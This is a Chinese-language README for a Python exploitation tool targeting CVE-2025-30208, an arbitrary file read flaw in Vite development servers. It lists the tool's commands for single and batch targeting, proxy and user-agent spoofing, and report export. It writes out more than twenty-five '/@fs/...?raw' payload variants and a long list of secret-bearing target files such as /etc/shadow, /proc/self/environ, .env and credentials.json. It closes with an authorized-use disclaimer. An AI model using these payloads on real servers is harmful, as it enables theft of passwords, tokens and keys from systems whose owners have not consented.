适用于 CVE-2025-30208 的高级漏洞扫描器,具备企业级特性
专业的 Vite 任意文件读取漏洞检测渗透测试工具
这是一款综合性漏洞扫描器,旨在检测和利用 Vite 开发服务器中的 CVE-2025-30208 漏洞。该漏洞允许通过 Vite 的文件系统端点进行任意文件读取,可能暴露敏感配置文件、源代码和系统信息。
该工具现在采用 模块化架构,以提高可维护性和可扩展性:
CVE-2025-30208.py - 主扫描器应用程序payloads.py - 高级利用载荷(60 多种变体)sensitive_files.py - 综合敏感文件数据库(200 多个文件)html_template.py - 增强型黑客风格 HTML 报告模板pip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# 启用详细模式以获取详细输出
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[按两次回车键结束]
CVE-2025-30208 > scan
# 配置代理
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# 设置自定义标头
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# 配置速率限制
CVE-2025-30208 > rate
Enter rate limit: 1.0
# 生成精美的 HTML 报告
CVE-2025-30208 > pull
# 启动 Web 服务器查看报告
CVE-2025-30208 > web
# 在指定端口启动 Web 服务器
CVE-2025-30208 > web 8081
# 停止 Web 服务器
CVE-2025-30208 > web off
扫描器现在使用 60 多种不同的载荷变体,组织在 payloads.py 中:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
该工具现在测试 200 多个敏感文件,组织在 sensitive_files.py 中:
/etc/passwd - 用户账户信息/etc/shadow - 加密密码数据/etc/services - 网络服务/etc/hosts - 主机名映射/etc/fstab - 文件系统表/etc/ssh/sshd_config - SSH 服务器配置/etc/crontab - 系统计划任务/etc/sudoers - Sudo 配置/proc/version - 内核版本/proc/cpuinfo - CPU 信息/proc/meminfo - 内存信息/proc/self/environ - 进程环境变量/proc/self/cmdline - 进程命令行/proc/net/tcp - TCP 连接/proc/net/udp - UDP 连接.env - 环境变量.env.local - 本地环境.env.production - 生产环境config.json - 应用程序配置settings.json - 应用程序设置application.properties - Spring 配置application.yml - YAML 配置database.yml - 数据库配置secrets.json - 秘密管理package.json - Node.js 依赖package-lock.json - 锁定依赖yarn.lock - Yarn 锁定文件vite.config.js - Vite 配置vite.config.ts - TypeScript Vite 配置tsconfig.json - TypeScript 配置webpack.config.js - Webpack 配置next.config.js - Next.js 配置nuxt.config.js - Nuxt.js 配置angular.json - Angular 配置vue.config.js - Vue.js 配置rollup.config.js - Rollup 配置eslint.config.js - ESLint 配置.git/config - Git 配置.gitignore - Git 忽略规则.gitattributes - Git 属性.gitmodules - Git 子模块.git/HEAD - 当前分支.git/logs/HEAD - Git 日志.git/refs/heads/master - master 分支.git/refs/heads/main - main 分支README.md - 项目文档CHANGELOG.md - 变更日志LICENSE - 许可证信息CONTRIBUTING.md - 贡献指南AUTHORS - 作者信息TODO.md - 待办列表ROADMAP.md - 开发路线图Dockerfile - Docker 配置docker-compose.yml - Docker Composedocker-compose.override.yml - 覆盖配置.dockerignore - Docker 忽略规则docker-compose.prod.yml - 生产配置docker-compose.dev.yml - 开发配置nginx.conf - Nginx 配置apache2.conf - Apache 配置httpd.conf - HTTP 守护进程配置.htaccess - Apache 访问控制web.config - IIS 配置robots.txt - 搜索引擎指令sitemap.xml - 站点结构manifest.json - Web 应用清单sw.js - Service Workerfirebase.json - Firebase 配置firebase.rules - Firebase 安全规则boot.ini - 启动配置autoexec.bat - 自动执行脚本system.ini - 系统配置win.ini - Windows 配置Users - 用户目录Windows - 系统文件Program Files - 应用程序目录System - 系统文件Library - 库文件Applications - 应用程序文件private/etc/hosts - hosts 文件private/etc/passwd - 用户账户database.db - SQLite 数据库database.sqlite - SQLite 数据库data.db - 数据数据库dump.sql - 数据库转储schema.sql - 数据库模式migrations - 数据库迁移logs - 日志目录error.log - 错误日志access.log - 访问日志app.log - 应用程序日志debug.log - 调试日志combined.log - 组合日志backup - 备份目录backup.sql - 数据库备份backup.zip - 压缩备份dump - 数据转储export - 数据导出auth.json - 认证配置credentials.json - 凭据存储keys.json - 密钥管理tokens.json - 令牌存储jwt.json - JWT 配置oauth.json - OAuth 配置api.json - API 配置swagger.json - API 文档openapi.json - OpenAPI 规范graphql.json - GraphQL 配置schema.json - API 模式cloudformation.yml - AWS CloudFormationserverless.yml - Serverless 配置terraform.tf - Terraform 配置kubernetes.yml - Kubernetes 配置k8s.yml - Kubernetes 配置analytics.json - 分析配置monitoring.json - 监控设置metrics.json - 指标配置telemetry.json - 遥测数据该工具现在生成 精美的黑客风格 HTML 报告,具备以下特性:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # 主扫描器应用程序
├── payloads.py # 高级利用载荷(60+)
├── sensitive_files.py # 敏感文件数据库(200+)
├── html_template.py # 增强型 HTML 报告模板
├── README.md # 本文档
├── requirements.txt # Python 依赖
├── logs/ # 日志文件目录
├── data_leak.html # 生成的 HTML 报告
├── data_leak.json # 生成的 JSON 报告
└── session.json # 保存的会话配置
我们欢迎贡献以改进本工具:
payloads.py 中的新载荷变体sensitive_files.py 中的额外敏感文件模式html_template.py 中的增强 HTML 模板本项目仅用于 教育和授权安全测试目的。
⚠️ 法律免责声明:本工具仅用于授权安全测试和研究目的。用户有责任确保在测试任何系统前获得适当授权。作者不对任何滥用本工具的行为负责。
⭐ 如果本工具对您有帮助,请给它一个星星!⭐
为安全社区倾情打造 ❤️
| 命令 | 描述 | 示例 |
|---|
set <option> <value> | 设置配置选项 | set RHOST 192.168.1.100 |
show options | 显示当前设置 | show options |
edit | 交互式选项编辑器 | edit |
run / exploit | 运行漏洞测试 | run |
batch | 批量扫描多个目标 | batch |
scan | 发现敏感文件 | scan |
pull | 导出结果为 HTML/JSON | pull |
web [on|off|port] | 用于 HTML 报告的 Web 服务器 | web 8080 |
save | 保存会话配置 | save |
load | 加载会话配置 | load |
test | 测试到目标的连接 | test |
validate | 验证当前配置 | validate |
verbose | 切换详细模式 | verbose |
proxy | 配置代理设置 | proxy |
headers | 设置自定义 HTTP 标头 | headers |
rate | 配置速率限制 | rate |
log | 显示日志信息 | log |
help / ? | 显示帮助 | help |
exit / quit | 退出工具 | exit |
| 选项 | 描述 | 默认值 | 验证 |
|---|
RHOST | 目标主机/IP 地址 | - | 主机名/IP 验证 |
RPORT | 目标端口号 | - | 端口范围 (1-65535) |
FILEPATH | 要测试的文件路径 | etc/passwd | 路径验证 |
PROXY | HTTP/HTTPS 代理 URL | - | URL 格式验证 |
VERBOSE | 启用详细输出 | false | 布尔值验证 |
RATE_LIMIT | 请求间延迟(秒) | 0.3 | 数值验证 |
THREADS | 批量扫描的线程数 | 5 | 整数验证 |
TIMEOUT | 请求超时(秒) | 5 | 整数验证 |
CUSTOM_HEADERS | 自定义 HTTP 标头(JSON) | {} | JSON 格式验证 |
prettier.config.js - Prettier 配置jest.config.js - Jest 配置babel.config.js - Babel 配置tailwind.config.js - Tailwind CSS 配置| 文件 | 描述 | 格式 |
|---|
data_leak.html | 增强型黑客风格 HTML 漏洞报告 | HTML |
data_leak.json | 结构化 JSON 导出 | JSON |
sensitive_files_discovery.json | 发现的敏感文件 | JSON |
session.json | 保存的会话配置 | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | 详细审计日志 | 文本 |